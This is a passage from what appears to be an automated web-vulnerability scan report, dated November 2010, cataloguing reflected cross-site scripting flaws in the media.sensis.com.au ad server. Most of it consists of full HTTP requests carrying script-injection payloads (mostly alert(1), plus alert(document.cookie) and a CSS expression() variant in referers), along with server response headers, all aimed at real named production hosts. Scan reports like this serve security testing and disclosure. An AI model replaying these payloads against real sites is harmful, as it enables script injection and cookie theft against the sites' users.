2.690. http://media.sensis.com.au/hserver/acc_random=983184589154/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=3/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9f05"><script>alert(1)</script>beea6e6f093 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver/acc_random=983184589154/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=3/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521?c9f05"><script>alert(1)</script>beea6e6f093=1 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(1)%3C/script%3E10e5e8898c1=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+4
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:22 GMT X-DirectServer: DS5 Content-Type: text/html Content-Length: 514 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9521d"><script>alert(1)</script>27064bc6a15 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver9521d"><script>alert(1)</script>27064bc6a15/acc_random=985211913613/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=4x1/pageid=365717345415 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://go.bigpond.com/home/index.jsp Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:21 GMT X-DirectServer: DS5 Content-Type: text/html Content-Length: 360 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9186b"><script>alert(1)</script>d44668a0661 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver/acc_random9186b"><script>alert(1)</script>d44668a0661=985211913613/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=4x1/pageid=365717345415 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://go.bigpond.com/home/index.jsp Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:22 GMT X-DirectServer: DS1 Content-Type: text/html Content-Length: 360 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
2.693. http://media.sensis.com.au/hserver/acc_random=985211913613/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=4x1/pageid=365717345415 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cdddb"><script>alert(1)</script>0dc27a31ae8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver/acc_random=985211913613/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.HOMEPAGE/AAMSZ=4x1/pageid=365717345415?cdddb"><script>alert(1)</script>0dc27a31ae8=1 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://go.bigpond.com/home/index.jsp Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:20 GMT X-DirectServer: DS3 Content-Type: text/html Content-Length: 363 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9009f"><script>alert(1)</script>bafec456006 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver9009f"><script>alert(1)</script>bafec456006/acc_random=987234488525/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=1x1/POSITION=BLW1/pageid=369648929007 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://bigpondmusic.com/?7c8ab%22style%3d%22x%3aexpression(alert(1))%2227f2f63ab70=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:50 GMT X-DirectServer: DS3 Content-Type: text/html Content-Length: 375 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 732f4"><script>alert(1)</script>72a002a2ff1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver/acc_random732f4"><script>alert(1)</script>72a002a2ff1=987234488525/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=1x1/POSITION=BLW1/pageid=369648929007 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://bigpondmusic.com/?7c8ab%22style%3d%22x%3aexpression(alert(1))%2227f2f63ab70=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:51 GMT X-DirectServer: DS2 Content-Type: text/html Content-Length: 375 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
2.696. http://media.sensis.com.au/hserver/acc_random=987234488525/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=1x1/POSITION=BLW1/pageid=369648929007 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f43e9"><script>alert(1)</script>0334e064762 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver/acc_random=987234488525/SITE=TEL.BIGPOND.MUSIC.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.MUSIC.HOME/AAMSZ=1x1/POSITION=BLW1/pageid=369648929007?f43e9"><script>alert(1)</script>0334e064762=1 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://bigpondmusic.com/?7c8ab%22style%3d%22x%3aexpression(alert(1))%2227f2f63ab70=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:48 GMT X-DirectServer: DS3 Content-Type: text/html Content-Length: 378 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d74f"><script>alert(1)</script>a3904bdf846 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver5d74f"><script>alert(1)</script>a3904bdf846/acc_random=995049956445/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=4x1/POSITION=ABV1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(1)%3C/script%3E10e5e8898c1=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+4
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:24 GMT X-DirectServer: DS3 Content-Type: text/html Content-Length: 433 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e7e6"><script>alert(1)</script>2731e94d087 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver/acc_random1e7e6"><script>alert(1)</script>2731e94d087=995049956445/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=4x1/POSITION=ABV1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(1)%3C/script%3E10e5e8898c1=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+4
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:25 GMT X-DirectServer: DS3 Content-Type: text/html Content-Length: 433 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
2.699. http://media.sensis.com.au/hserver/acc_random=995049956445/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=4x1/POSITION=ABV1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d8b0"><script>alert(1)</script>45856d743a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver/acc_random=995049956445/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=4x1/POSITION=ABV1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521?4d8b0"><script>alert(1)</script>45856d743a=1 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(1)%3C/script%3E10e5e8898c1=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+4
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:23 GMT X-DirectServer: DS3 Content-Type: text/html Content-Length: 435 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19832"><script>alert(1)</script>7e4edb19c96 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver19832"><script>alert(1)</script>7e4edb19c96/acc_random=995441455010/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=373826094244 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://bigpondvideo.com/bphf/header/adh.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5; LE2=mkowC1+5a8+31+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:59 GMT X-DirectServer: DS1 Content-Type: text/html Content-Length: 467 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0fb2"><script>alert(1)</script>0cfb1204775 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver/acc_randomf0fb2"><script>alert(1)</script>0cfb1204775=995441455010/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=373826094244 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://bigpondvideo.com/bphf/header/adh.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5; LE2=mkowC1+5a8+31+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:13:00 GMT X-DirectServer: DS2 Content-Type: text/html Content-Length: 467 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
2.702. http://media.sensis.com.au/hserver/acc_random=995441455010/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=373826094244 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8271d</script>c46d369eece was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /hserver/acc_random=995441455010/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=373826094244?8271d</script>c46d369eece=1 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://bigpondvideo.com/bphf/header/adh.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5; LE2=mkowC1+5a8+31+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:55 GMT X-DirectServer: DS2 Content-Type: text/html Content-Length: 2416 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
2.703. http://media.sensis.com.au/hserver/acc_random=995441455010/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=373826094244 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload abb06"><script>alert(1)</script>c9d6aa1c2e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver/acc_random=995441455010/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=373826094244?abb06"><script>alert(1)</script>c9d6aa1c2e2=1 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://bigpondvideo.com/bphf/header/adh.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5; LE2=mkowC1+5a8+31+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:50 GMT X-DirectServer: DS3 Content-Type: text/html Content-Length: 696 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4d50"><script>alert(1)</script>0efa3e551a1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hservera4d50"><script>alert(1)</script>0efa3e551a1/acc_random=998242088404/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=2/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:37 GMT X-DirectServer: DS5 Content-Type: text/html Content-Length: 511 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86e0a"><script>alert(1)</script>28f9b0d0f51 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
